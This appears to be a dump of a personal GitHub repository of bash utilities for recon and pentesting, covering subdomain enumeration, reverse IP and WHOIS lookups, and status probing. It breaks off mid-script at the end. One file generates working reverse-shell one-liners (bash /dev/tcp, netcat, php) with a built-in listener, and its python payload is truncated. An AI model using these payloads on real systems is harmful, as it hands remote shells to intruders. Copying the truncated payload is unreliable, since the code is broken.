├── .all-contributorsrc ├── ASNenum.sh ├── DomainToIP.sh ├── Get_all_domains.sh ├── README.md ├── ReverseIP.sh ├── Reverse_Shell_payload_generator.sh ├── StatusCode.sh ├── autorecon.sh ├── awscript.sh ├── ddns_godaddy.sh ├── domains.sh ├── downlocal.sh ├── elastic.sh ├── encall.sh ├── enumnom.sh ├── file-share.sh ├── google-hacking.sh ├── lf.sh ├── monitor.sh ├── music.sh ├── mynmap.sh ├── mywhois.sh ├── naabu-to-nmap.sh ├── netspace.sh ├── port.sh ├── reclass.sh ├── recon.sh ├── send-to-burp.sh ├── setup-tools.sh ├── title.sh └── vpn_on_vps.sh /.all-contributorsrc: -------------------------------------------------------------------------------- 1 | { 2 | "files": [ 3 | "README.md" 4 | ], 5 | "imageSize": 100, 6 | "commit": false, 7 | "contributors": [ 8 | { 9 | "login": "terminalforlife", 10 | "name": "Terminal for Life", 11 | "avatar_url": "https://avatars3.githubusercontent.com/u/31768530?v=4", 12 | "profile": "https://www.youtube.com/channel/UCfp-lNJy4QkIGnaEE6NtDSg", 13 | "contributions": [ 14 | "code" 15 | ] 16 | } 17 | ], 18 | "contributorsPerLine": 7, 19 | "projectName": "bash_scripting", 20 | "projectOwner": "bing0o", 21 | "repoType": "github", 22 | "repoHost": "https://github.com", 23 | "skipCi": true 24 | } 25 | -------------------------------------------------------------------------------- /ASNenum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # if the first argument is an IP, the response will be the ASNumber 4 | # if the first argument is an ASN, the response will be a list of CIDRS 5 | # 6 | 7 | [ -z "$1" ] && { printf "[!] Usage: ${0##*/} \n"; exit 1; } 8 | 9 | IP() { 10 | curl -sk "https://api.hackertarget.com/aslookup/?q=$1" | awk '{gsub(/,/,"\n",$0); gsub(/\"/,"",$0); print "ASN: AS"$2 "\nCIDR: "$3 "\nORG: "$4}' 11 | } 12 | 13 | ASN() { 14 | curl -sk https://api.hackertarget.com/aslookup/\?q\=$1 | grep -v "," 15 | } 16 | 17 | if [[ $1 =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then 18 | IP $1 19 | else 20 | ASN $1 21 | fi 22 | -------------------------------------------------------------------------------- /DomainToIP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Simple bash script to get IP address From hostname 4 | # 5 | 6 | [ -z "$1" ] && { printf "[!] ${0##*/} \n"; exit 1; } 7 | 8 | NSL() { 9 | nslookup "$1" | grep -v "#53" | grep Address | awk '{print $2}' 10 | } 11 | 12 | 13 | while read host 14 | do 15 | #printf "\n[+] Host: $host\n" 16 | NSL $host 17 | done < "$1" 18 | -------------------------------------------------------------------------------- /Get_all_domains.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to enumerate for all domains related to your target based on the Registrare Email/Name. 4 | # 5 | 6 | [ -z "$1" ] && { echo "[!] ./alldomains.sh "; exit 1; } 7 | 8 | curl -s -XPOST https://reverse-whois-api.whoisxmlapi.com/api/v2 -d "{\"apiKey\": \"YOUR_API_KEY\",\"mode\": \"purchase\",\"basicSearchTerms\": {\"include\": [\"$1\"]}}" | tr ',\|[' '\n' | cut -d '"' -f 2 | grep -v "domainsCount\|domainsList" 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bash_scripting 2 | 3 | [![All Contributors](https://img.shields.io/badge/all_contributors-1-orange.svg?style=flat-square)](#contributors) 4 | 5 | [![Bash Shell](https://badges.frapsoft.com/bash/v1/bash.png?v=103)](https://github.com/ellerbrock/open-source-badges/) 6 | 7 | ### Description: 8 | bash scripts I use daily to automate some stuff and make linux easier, there's no specific purpose behind this repo only to share any script that i think will be usefull for somebody else, or anyone who wants to learn bash script and needs some ideas to practice (that's how i learnt :D) 9 | 10 | Most of the script in this repo has some comments inside to explain the purpose of the script and how it can be used, but i'm gonna leave here a description for some of them and how they can be used if needed. 11 | 12 | - [ASNenum.sh](https://github.com/bing0o/bash_scripting/blob/master/ASNenum.sh): 13 | this script use [api.hackertarget.com](https://api.hackertarget.com/aslookup/) to do ASN Enumeration against an IP address or ASN number, if the input is an IP address you will get an ASN number and a CIDR, if the input is an ASN you will get a list of CIDRs (one or more) that belongs to the same owner. 14 | 15 | - [DomainToIP.sh](https://github.com/bing0o/bash_scripting/blob/master/DomainToIP.sh): 16 | wrapper around nslookup linux cli tool to translate hostnames to IPs. 17 | 18 | - [Get_all_domains.sh](https://github.com/bing0o/bash_scripting/blob/master/Get_all_domains.sh): 19 | uses https://reverse-whois-api.whoisxmlapi.com/ to enumerate TLDs (Top Level Domains) that belongs to the same owner based on Registrare Email/Name whois records. 20 | 21 | - [ReverseIP](https://github.com/bing0o/bash_scripting/blob/master/ReverseIP.sh): 22 | script to do a reverse ip lookup, you give this script an IP address and it will try to find all the domains hosted on that IP. 23 | 24 | - [Reverse_Shell_payload_generator.sh](https://github.com/bing0o/bash_scripting/blob/master/Reverse_Shell_payload_generator.sh): 25 | this is a script that generate reverse shall payloads for you, more info could be found here: https://bing0o.github.io/posts/reverse-shell-generator/ 26 | 27 | - [StatusCode.sh](https://github.com/bing0o/bash_scripting/blob/master/StatusCode.sh): 28 | checks for status code, size, redirected url and the Title for a list of domains or ips. 29 | 30 | - [domains.sh](https://github.com/bing0o/bash_scripting/blob/master/domains.sh): 31 | this tool is no longer going to be update, check the newer version here: https://github.com/bing0o/SubEnum 32 | 33 | - [encall.sh](https://github.com/bing0o/bash_scripting/blob/master/encall.sh): 34 | wrapper around my other python tool ([crypto](https://github.com/bing0o/Python-Scripts/blob/master/crypto.py) which is a tool to encrypt and decrypt files), to encrypt all the files in the current directory. 35 | 36 | - [file-share.sh](https://github.com/bing0o/bash_scripting/blob/master/file-share.sh): 37 | uses https://www.file.io/ to share files, this tool will provide a one time use link for the shared file which will no longer be available after the first download, usefull when you want to transfer small files between two systems. 38 | 39 | - [naabu-to-nmap.sh](https://github.com/bing0o/bash_scripting/blob/master/naabu-to-nmap.sh): 40 | this script takes the results of [naabu](https://github.com/projectdiscovery/naabu) and run nmap against them with `default` and `vuln` scripts and other options to go deep with each port `naabu` found. 41 | 42 | - [port.sh](https://github.com/bing0o/bash_scripting/blob/master/port.sh): 43 | simple port scanner for fast results, I use it to check if a specific port is open on a remote servers. 44 | 45 | - [send-to-burp.sh](https://github.com/bing0o/bash_scripting/blob/master/send-to-burp.sh): 46 | bash script to send a list of URLs from command line to burpsuite to add them to your site map, without having to open them in the browser. 47 | 48 | - [vpn_on_vps.sh](https://github.com/bing0o/bash_scripting/blob/master/vpn_on_vps.sh): 49 | if you run a VPN on a remote server for whatever reason, you will lose your ssh connection and you won't be able to connect to the remote server until the VPN connection is down, this script will prevent that from happening, when you run this script on remote server before running your VPN client you won't lose your ssh connection and you still can connect to the server while the VPN is still up and running. 50 | 51 | 52 | ## Support 53 | you can support me here: https://www.buymeacoffee.com/bing0o 54 | 55 | ## Contributors ✨ 56 | 57 | Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Terminal for Life
Terminal for Life

💻
67 | 68 | 69 | 70 | 71 | 72 | This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome! 73 | -------------------------------------------------------------------------------- /ReverseIP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Simple bash script for Reverse IP Lookup, 4 | # To get all the domains hosted on the server 5 | # 6 | # Don't forget to put your API key in YOUR_API_KEY 7 | # 8 | 9 | PRG=${0##*/} 10 | 11 | API_cred() { 12 | cmd=$(curl -sk "https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=YOUR_API_KEY&ip=$ip" | sed 's/,/\n/g' | grep "name" | sed 's/.*:\|"//g') 13 | [ "$out" == False ] && printf "$cmd\n" || { printf "$cmd\n" | tee -a $out; } 14 | } 15 | 16 | API() { 17 | cmd=$(curl -sk "https://api.hackertarget.com/reverseiplookup/?q=$ip") 18 | [ "$out" == False ] && printf "$cmd\n" || { printf "$cmd\n" | tee -a $out; } 19 | } 20 | 21 | Usage() { 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \rOptions: 26 | \r -t, --type - Type of the API (Dafault: ht), 27 | \r wxa -> WhoisXmlApi, ht -> HackerTarget, all -> To use both 28 | \r -i, --ip - The Target IP. 29 | \r -o, --output - The OutPut File. 30 | \r -l, --loop - To use pipe e.g(cat ips.txt | $PRG -l) 31 | \rExample: 32 | \r $PRG --type all --ip 8.8.8.8 --output hosts.txt 33 | \r cat IPs.txt | $PRG --loop --output hosts.txt 34 | EOF 35 | } 36 | 37 | ip=False 38 | type=ht 39 | loop=False 40 | out=False 41 | 42 | while [ -n "$1" ]; do 43 | case $1 in 44 | -t|--type) 45 | [ "$2" != "wxa" ] && [ "$2" != "ht" ] && [ "$2" != "all" ] && { printf "[!] -t/--type must be [wxa, ht, all], use -h for more information\n"; exit 1; } 46 | type=$2 47 | shift ;; 48 | -i|--ip) 49 | ip=$2 50 | shift ;; 51 | -l|--loop) 52 | loop=True ;; 53 | -o|--output) 54 | out=$2 55 | shift ;; 56 | *) 57 | Usage 58 | exit 1 ;; 59 | esac 60 | shift 61 | done 62 | 63 | TYPE() { 64 | [ "$type" == all ] && { 65 | API 66 | API_cred 67 | } || { 68 | [ type == wxa ] && API_cred || API 69 | } 70 | } 71 | 72 | [ "$ip" == False ] && [ "$loop" == False ] && { printf "[!] Arguments -i/--ip or -l/--loop are required!, Enter -h for more information!\n"; exit 1; } 73 | 74 | [ "$ip" != False ] && { 75 | TYPE 76 | } || { 77 | while read ip; do 78 | TYPE 79 | done 80 | } 81 | 82 | -------------------------------------------------------------------------------- /Reverse_Shell_payload_generator.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Bash script to generate reverse shell payloads in python, php, netcat and bash | easy and fast :D 4 | # Updates will pushed to this repo: https://github.com/bing0o/Reverse_Shell_Generator/ 5 | # This tool Required for URL Encoding: https://github.com/ffuf/pencode 6 | # 7 | 8 | TYPE="bash" 9 | IP="$(ifconfig tun0 2>/dev/null | grep netmask | awk '{print $2}')" 10 | PORT="$(shuf -i 10000-65000 -n 1)" 11 | INTERFACE=False 12 | RUN=False 13 | ENCODE=False 14 | ENCODERS=( 15 | base64 16 | url 17 | ) 18 | 19 | 20 | 21 | Usage(){ 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \r#OPTIONS: 26 | \r -t, --type - Payload Type [python, netcat, bash, php]. 27 | \r -i, --ip - Local IP. 28 | \r -p, --port - Local Port. 29 | \r -r, --run - Run Netcat Listener. 30 | \r -e, --encode - Encode The Payload [base64, url]. 31 | \r -I, --interface - Get The IP From Specific Interface (Default: tun0). 32 | \r -h, --help - Prints The Help and Exit. 33 | \r 34 | EOF 35 | exit 36 | } 37 | 38 | 39 | while [ -n "$1" ]; do 40 | case $1 in 41 | -t|--type) 42 | TYPE="$2" 43 | shift ;; 44 | -i|--ip) 45 | IP="$2" 46 | shift ;; 47 | -p|--port) 48 | PORT="$2" 49 | shift ;; 50 | -r|--run) 51 | RUN=True ;; 52 | -e|--encode) 53 | ENCODE="$2" 54 | if [[ ! " ${ENCODERS[@]} " =~ " ${ENCODE} " ]]; then 55 | printf "[!] Unknown Encoder: $ENCODE\n" 56 | Usage 57 | fi 58 | shift ;; 59 | -I|--interface) 60 | INTERFACE="$2" 61 | shift ;; 62 | -h|--help) 63 | Usage ;; 64 | *) 65 | echo "[-] Unknown Option: $1" 66 | Usage ;; 67 | esac 68 | shift 69 | done 70 | 71 | 72 | Payload(){ 73 | [ "$INTERFACE" != False ] && IP="$(ifconfig $INTERFACE 2>/dev/null | grep netmask | awk '{print $2}')" 74 | [ "$TYPE" == "bash" ] && PAYLOAD="bash -i >& /dev/tcp/$IP/$PORT 0>&1" 75 | [ "$TYPE" == "python" ] && PAYLOAD="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$IP\",$PORT));o" 76 | [ "$TYPE" == "netcat" ] && PAYLOAD="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f" 77 | [ "$TYPE" == "php" ] && PAYLOAD="php -r '\$sock=fsockopen(\"$IP\",$PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" 78 | 79 | [[ "$ENCODE" == False ]] && echo "$PAYLOAD" || { 80 | [ "$ENCODE" == "base64" ] && echo "$PAYLOAD" | base64 -w 0 81 | [ "$ENCODE" == "url" ] && echo "$PAYLOAD" | pencode urlencode 82 | } 83 | } 84 | 85 | 86 | Payload; echo 87 | 88 | 89 | [ "$RUN" != False ] && printf "\n[+] Starting Netcat Listener:\n" && nc -nvlp $PORT 90 | -------------------------------------------------------------------------------- /StatusCode.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to check for status code, size, redirected url and the Title for a list of domains or ips 4 | # 5 | 6 | PRG=${0##*/} 7 | VERSION="2020-03-24" 8 | 9 | Usage(){ 10 | while read -r line; do 11 | printf "%b\n" "$line" 12 | done <<-EOF 13 | \r$PRG:\t\t - Tool reads a list of Domanis or IPs and gives you: status code, size, redirected link and the Title. 14 | \r 15 | \rOptions: 16 | \r -l, --list - List of Domains or IPs. 17 | \r -t, --Threads - Threads number (Default: 5). 18 | \r -s, --status - Display only The specified Status Code. 19 | \r -o, --output - The output file to save the results. 20 | \r -p, --path - To use a specific path ex(/robots.txt). 21 | \r -n, --nocolor - Displays the Status code without color. 22 | \r -h, --help - Displays this Informations and Exit. 23 | \r -v, --version - Displays The Version 24 | \rExample: 25 | \r $PRG -l domains.txt -t 20 -o status.txt 26 | \r 27 | 28 | EOF 29 | } 30 | 31 | list=False 32 | threads=5 33 | status=False 34 | out=False 35 | color=True 36 | path=False 37 | 38 | while [ -n "$1" ]; do 39 | case $1 in 40 | -l|--list) 41 | [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; } 42 | list=$2 43 | shift ;; 44 | -t|--threads) 45 | [ -z "$2" ] && { printf "[-] -t/--threads needs a number of threads\n"; exit 1; } 46 | threads=$2 47 | shift ;; 48 | -s|--status) 49 | status=$2 50 | shift ;; 51 | -p|--path) 52 | [ -z "$2" ] && { printf "[-] -p/--path needs a path ex(/robots.txt)\n"; exit 1; } 53 | path=$2 54 | shift ;; 55 | -o|--output) 56 | [ -z "$2" ] && { printf "[-] -o/--output needs a file to write the results to.\n"; exit 1; } 57 | out=$2 58 | shift ;; 59 | -h|--help) 60 | Usage 61 | exit ;; 62 | -v|--version) 63 | printf "$VERSION\n" 64 | exit ;; 65 | -n|--nocolor) 66 | color=False;; 67 | *) 68 | printf "[-] Error: Unknown Options: $1\n" 69 | Usage; exit 1 ;; 70 | esac 71 | shift 72 | done 73 | 74 | mycurl(){ 75 | path=$4 76 | status=$5 77 | if [[ "$path" == False ]]; then 78 | path="" 79 | elif [[ "$path" != "/"* ]]; then 80 | path="/"$path 81 | fi 82 | result=$(curl -sk $1$path --connect-timeout 10 -w '%{http_code} %{url_effective} %{size_download} %{redirect_url}\n' -o /dev/null) 83 | title=$(curl --connect-timeout 10 $1$path -so - | grep -iPo '(?<=)(.*)(?=)') 84 | out=$2 85 | if [[ "$3" == True ]]; then 86 | if [[ "$result" == "2"* ]]; then 87 | cresult="\e[32m$result\e[0m" 88 | elif [[ "$result" == "3"* ]]; then 89 | cresult="\e[34m$result\e[0m" 90 | elif [[ "$result" == "4"* ]]; then 91 | cresult="\e[31m$result\e[0m" 92 | else 93 | cresult="$result" 94 | fi 95 | else 96 | cresult="$result" 97 | fi 98 | [[ "$status" == False ]] && echo -e "$cresult [$title]" && [ $out != False ] && echo "$result [$title]" >> $out || { 99 | [[ "$result" == "$status"* ]] && echo -e "$cresult [$title]" 100 | [ $out != False ] && echo "$result [$title]" >> $out 101 | } 102 | 103 | } 104 | 105 | 106 | main(){ 107 | cat $list | xargs -I{} -P $threads bash -c "mycurl {} $out $color $path $status" 108 | } 109 | 110 | [ "$list" == False ] && { 111 | printf "[!] Argument -l/--list is Required!\n" 112 | Usage 113 | exit 1 114 | } || { 115 | export -f mycurl 116 | main 117 | } 118 | 119 | -------------------------------------------------------------------------------- /autorecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | end="\e[0m" 5 | cyan="\e[36m" 6 | purple="\e[35m" 7 | 8 | read -p "[+] Enter Domain: " domain 9 | 10 | # https://github.com/s0md3v/Photon 11 | echo "" 12 | echo -e $cyan"[*] Start Photon"$end # Mapping the target application 13 | tmux split-window -h "photon '-u $domain -t 30 --wayback --dns --keys'; echo '[+] Done!'; read" 14 | echo "[!] Running in New Tmux Pane!" 15 | #echo "[+] Results: In $domain Folder" 16 | 17 | # link: https://github.com/Edu4rdSHL/findomain 18 | echo "" 19 | echo -e $cyan"[*] Start Findomain"$end # Getting a list of subdomains 20 | findomain -t $domain -o &>/dev/null 21 | size=$(wc -l $domain.txt) 22 | echo "[+] Results: $size" 23 | 24 | 25 | 26 | # https://github.com/tomnomnom/httprobe 27 | echo -e "\n[+] HTTProbe" 28 | cat $domain.txt | httprobe > hosts 29 | echo "[*] Results: "$(wc -l hosts) 30 | 31 | # link: https://github.com/bing0o/Python-Scripts/blob/master/subchecker.py 32 | #echo "" 33 | #echo -e $cyan"[*] Start Subchecker"$end # Filter the result and save only the live subdomains 34 | #subchecker -w "$domain.txt" -t 30 -o "$domain-checked" 1>/dev/null 35 | #size=$(wc -l $domain-checked) 36 | #echo "[+] Results: $size" 37 | 38 | # link: https://github.com/bing0o/Python-Scripts/blob/master/webtech.py 39 | echo "" 40 | echo -e $cyan"[*] Start WebTech"$end # Getting the technologies that running in each subdomain 41 | webtech -w "hosts" -t 30 -o "$domain-Tech" -i 1>/dev/null 42 | size=$(wc -l $domain-Tech) 43 | echo "[+] Results: $size" 44 | 45 | # https://github.com/tomnomnom/meg 46 | echo -e "\n[+] Start Meg" 47 | meg -d 1000 -v / 48 | 49 | 50 | echo -e "\n[!] Changing The Directory To ./out" 51 | cd out 52 | 53 | # gf I changed its name to gff since i already have a linux tool called gf! 54 | # https://github.com/tomnomnom/gf 55 | echo -e "\n[*] The OutPut For aws-keys" 56 | gff aws-keys 57 | 58 | echo -e "\n[*] The OutPut For base64" 59 | gff base64 60 | 61 | echo -e "\n[*] The OutPut For cors" 62 | gff cors 63 | 64 | echo -e "\n[*] The OutPut For debug-pages" 65 | gff debug-pages 66 | 67 | echo -e "\n[*] The OutPut For firebase" 68 | gff firebase 69 | 70 | echo -e "\n[*] The OutPut For fw" 71 | gff fw 72 | 73 | echo -e "\n[*] The OutPut For go-functions" 74 | gff go-functions 75 | 76 | echo -e "\n[*] The OutPut For http-auth" 77 | gff http-auth 78 | 79 | echo -e "\n[*] The OutPut For ip" 80 | gff ip 81 | 82 | echo -e "\n[*] The OutPut For json-sec" 83 | gff json-sec 84 | 85 | #echo -e "\n[*] The OutPut For meg-headers" 86 | #gff meg-headers 87 | 88 | echo -e "\n[*] The OutPut For php-curl" 89 | gff php-curl 90 | 91 | echo -e "\n[*] The OutPut For php-errors" 92 | gff php-errors 93 | 94 | echo -e "\n[*] The OutPut For php-serialized" 95 | gff php-serialized 96 | 97 | echo -e "\n[*] The OutPut For php-sinks" 98 | gff php-sinks 99 | 100 | echo -e "\n[*] The OutPut For php-sources" 101 | gff php-sources 102 | 103 | echo -e "\n[*] The OutPut For s3-buckets" 104 | gff s3-buckets 105 | 106 | echo -e "\n[*] The OutPut For sec" 107 | gff sec 108 | 109 | echo -e "\n[*] The OutPut For servers" 110 | gff servers 111 | 112 | #echo -e "\n[*] The OutPut For strings" 113 | #gff strings 114 | 115 | echo -e "\n[*] The OutPut For takeovers" 116 | gff takeovers 117 | 118 | echo -e "\n[*] The OutPut For upload-fields" 119 | gff upload-fields 120 | 121 | #echo -e "\n[*] The OutPut For urls" 122 | #gff urls 123 | 124 | echo -e "\n[0] Done!" 125 | 126 | -------------------------------------------------------------------------------- /awscript.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # cat ips | xargs -I% sh -c "host %" 4 | # -z True if it's a zero | -n True if it's not a zero! 5 | [ -z $1 ] && { echo "#Usage: awscript.sh " >&2; exit 1; } 6 | 7 | lines=$(wc -l < $1) 8 | c=1 9 | while read line; do 10 | echo -ne "[$c/$lines] $line \r" 11 | let c=c+1 12 | res=$(host $line) 13 | if [[ $res == *"amazonaws"* ]]; then 14 | echo $line" | " $res 15 | fi 16 | done < $1 17 | -------------------------------------------------------------------------------- /ddns_godaddy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Bash script to update your godaddy dns record to your current public ip address (dynamic dns). 4 | # 5 | 6 | Usage(){ 7 | while read -r line; do 8 | printf "%b\n" "$line" 9 | done <<-EOF 10 | \r#OPTIONS: 11 | \r -i, --ip - Your Public IP Address. 12 | \r -d, --domain - Your Domain Name (example.com). 13 | \r -t, --type - DNS Record Type (default: A). 14 | \r -n, --name - Subdomain Name (mysub) without domain name. 15 | \r -k, --key - Godaddy Key (here: https://developer.godaddy.com/getstarted). 16 | \r -s, --secret - Godaddy Secret. 17 | \r -h, --help - Displays The Help And Exit. 18 | \r 19 | EOF 20 | exit 21 | } 22 | 23 | # you can set default values here # 24 | IP="$(curl -sk ipinfo.io/ip)" 25 | DOMAIN="example.com" 26 | TYPE="A" 27 | NAME="mysub" 28 | KEY="" 29 | SEC="" 30 | ################################### 31 | 32 | 33 | while [ -n "$1" ]; do 34 | case $1 in 35 | -i|--ip) 36 | IP="$2" 37 | shift ;; 38 | -d|--domain) 39 | DOMAIN="$2" 40 | shift ;; 41 | -t|--type) 42 | TYPE="$2" 43 | shift ;; 44 | -n|--name) 45 | NAME="$2" 46 | shift ;; 47 | -k|--key) 48 | KEY="$2" 49 | shift ;; 50 | -s|--secret) 51 | SEC="$2" 52 | shift ;; 53 | -h|--help) 54 | Usage ;; 55 | *) 56 | echo "[-] Unknown Option: $1" 57 | Usage ;; 58 | esac 59 | shift 60 | done 61 | 62 | DATA="[{\"data\": \"${IP}\", \"ttl\": 600}]" 63 | HEADERS="Authorization: sso-key ${KEY}:${SEC}" 64 | DNS=$(curl -s -XGET -H "$HEADERS" "https://api.godaddy.com/v1/domains/$DOMAIN/records/$TYPE/$NAME" | jq -r '.[].data') 65 | 66 | [[ ${IP} =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] || { echo "[!] Check Your Internet Connection and Try Again!"; exit 1; } 67 | 68 | [[ ${IP} == ${DNS} ]] && { echo "[!] Same IP, No Need To Update!"; exit 0; } 69 | 70 | echo "New IP: ${IP}" 71 | 72 | echo "[+] Updating DNS Record...." 73 | 74 | curl -sk -XPUT -H "Content-Type: application/json" -H "Accept: application/json" -H "${HEADERS}" -d "${DATA}" https://api.godaddy.com/v1/domains/${DOMAIN}/records/${TYPE}/${NAME} 75 | 76 | echo "[+] Done!" 77 | -------------------------------------------------------------------------------- /domains.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # script for subdomain enumeration using 4 of the best tools and some online services: 4 | # * findomain: https://github.com/Edu4rdSHL/findomain 5 | # * SubFinder: https://github.com/projectdiscovery/subfinder 6 | # * Amass: https://github.com/OWASP/Amass 7 | # * AssetFinder: https://github.com/tomnomnom/assetfinder 8 | # 9 | 10 | bold="\e[1m" 11 | Underlined="\e[4m" 12 | red="\e[31m" 13 | green="\e[32m" 14 | blue="\e[34m" 15 | end="\e[0m" 16 | VERSION="2022-03-20" 17 | 18 | PRG=${0##*/} 19 | 20 | 21 | Usage(){ 22 | while read -r line; do 23 | printf "%b\n" "$line" 24 | done <<-EOF 25 | \r 26 | \r# ${bold}${blue}Options${end}: 27 | \r -d, --domain - Domain To Enumerate 28 | \r -l, --list - List of domains 29 | \r -u, --use - Tools To Be Used ex(Findomain,Subfinder,...,etc) 30 | \r -e, --exclude - Tools To Be Excluded ex(Findomain,Amass,...,etc) 31 | \r -o, --output - The output file to save the Final Results (Default: -DATE-TIME.txt) 32 | \r -s, --silent - The Only output will be the found subdomains - (Results saved: subenum-.txt). 33 | \r -k, --keep - To Keep the TMPs files (the results from each tool). 34 | \r -r, --resolve - To Probe For Working HTTP and HTTPS Subdomains, (Output: resolved-.txt). 35 | \r -t, --thread - Threads for Httprobe - works with -r/--resolve option (Default: 40) 36 | \r -p, --parallel - To Use Parallel For Faster Results, Doesn't Work With -e/--exclude or -u/--use. 37 | \r -h, --help - Displays this help message and exit. 38 | \r -v, --version - Displays the version and exit. 39 | 40 | \r# ${bold}${blue}Available Tools${end}: 41 | \r wayback,crt,bufferover,Findomain,Subfinder,Amass,Assetfinder 42 | 43 | \r# ${bold}${blue}Examples${end}: 44 | \r - To use a specific Tool(s): 45 | \r $PRG -d hackerone.com -u Findomain,wayback,Subfinder 46 | \r - To exclude a specific Tool(s): 47 | \r $PRG -d hackerone.com -e Amass,Assetfinder 48 | \r - To use all the Tools: 49 | \r $PRG -d hackerone.com 50 | \r - To run SubEnum.sh against a list of domains: 51 | \r $PRG -l domains.txt 52 | \r - Run with parallel for faster results, (Doesn't work with -e/--exclude or -u/--use). 53 | \r 1- $PRG --domain target.com --parallel 54 | \r 2- $PRG --list domains.txt --parallel 55 | EOF 56 | exit 1 57 | } 58 | 59 | 60 | spinner(){ 61 | processing="${1}" 62 | while true; 63 | do 64 | dots=( 65 | "/" 66 | "-" 67 | "\\" 68 | "|" 69 | ) 70 | for dot in ${dots[@]}; 71 | do 72 | printf "[${dot}] ${processing} \U1F50E" 73 | printf " \r" 74 | sleep 0.3 75 | done 76 | 77 | done 78 | } 79 | 80 | 81 | wayback() { 82 | [ "$silent" == True ] && curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$domain&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u | anew subenum-$domain.txt || { 83 | [[ ${PARALLEL} == True ]] || { spinner "${bold}WayBackMachine${end}" & 84 | PID="$!" 85 | } 86 | curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$domain&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u > tmp-wayback-$domain 87 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 88 | echo -e "$bold[*] WayBackMachine$end: $(wc -l < tmp-wayback-$domain)" 89 | } 90 | } 91 | 92 | crt() { 93 | [ "$silent" == True ] && curl -sk "https://crt.sh/?q=%.$domain&output=json" | tr ',' '\n' | awk -F'"' '/name_value/ {gsub(/\*\./, "", $4); gsub(/\\n/,"\n",$4);print $4}' | anew subenum-$domain.txt || { 94 | [[ ${PARALLEL} == True ]] || { spinner "${bold}crt.sh${end}" & 95 | PID="$!" 96 | } 97 | curl -sk "https://crt.sh/?q=%.$domain&output=json" | tr ',' '\n' | awk -F'"' '/name_value/ {gsub(/\*\./, "", $4); gsub(/\\n/,"\n",$4);print $4}' | sort -u > tmp-crt-$domain 98 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 99 | echo -e "$bold[*] crt.sh$end: $(wc -l < tmp-crt-$domain)" 100 | } 101 | } 102 | 103 | bufferover() { 104 | [ "$silent" == True ] && curl -s "https://dns.bufferover.run/dns?q=.$domain" | grep $domain | awk -F, '{gsub("\"", "", $2); print $2}' | anew subenum-$domain.txt || { 105 | [[ ${PARALLEL} == True ]] || { spinner "${bold}BufferOver${end}" & 106 | PID="$!" 107 | } 108 | curl -s "https://dns.bufferover.run/dns?q=.$domain" | grep $domain | awk -F, '{gsub("\"", "", $2); print $2}' | sort -u > tmp-bufferover-$domain 109 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 110 | echo -e "$bold[*] BufferOver$end: $(wc -l < tmp-bufferover-$domain)" 111 | } 112 | } 113 | 114 | Findomain() { 115 | [ "$silent" == True ] && findomain -t $domain -q 2>/dev/null | anew subenum-$domain.txt || { 116 | [[ ${PARALLEL} == True ]] || { spinner "${bold}Findomain${end}" & 117 | PID="$!" 118 | } 119 | findomain -t $domain -u tmp-findomain-$domain &>/dev/null 120 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 121 | echo -e "$bold[*] Findomain$end: $(wc -l tmp-findomain-$domain 2>/dev/null | awk '{print $1}')" 122 | } 123 | } 124 | 125 | Subfinder() { 126 | [ "$silent" == True ] && subfinder -all -silent -d $domain 2>/dev/null | anew subenum-$domain.txt || { 127 | [[ ${PARALLEL} == True ]] || { spinner "${bold}SubFinder${end}" & 128 | PID="$!" 129 | } 130 | subfinder -all -silent -d $domain 1> tmp-subfinder-$domain 2>/dev/null 131 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 132 | echo -e "$bold[*] SubFinder$end: $(wc -l < tmp-subfinder-$domain)" 133 | } 134 | } 135 | 136 | Amass() { 137 | # amass is with "-passive" option to make it faster, but it may cuz less results 138 | [ "$silent" == True ] && amass enum -passive -norecursive -noalts -d $domain 2>/dev/null | anew subenum-$domain.txt || { 139 | [[ ${PARALLEL} == True ]] || { spinner "${bold}Amass${end}" & 140 | PID="$!" 141 | } 142 | amass enum -passive -norecursive -noalts -d $domain 1> tmp-amass-$domain 2>/dev/null 143 | [[ ${PARALLEL} == True ]] || kill ${PID} 2>/dev/null 144 | echo -e "$bold[*] Amass$end: $(wc -l < tmp-amass-$domain)" 145 | } 146 | } 147 | 148 | Assetfinder() { 149 | [ "$silent" == True ] && 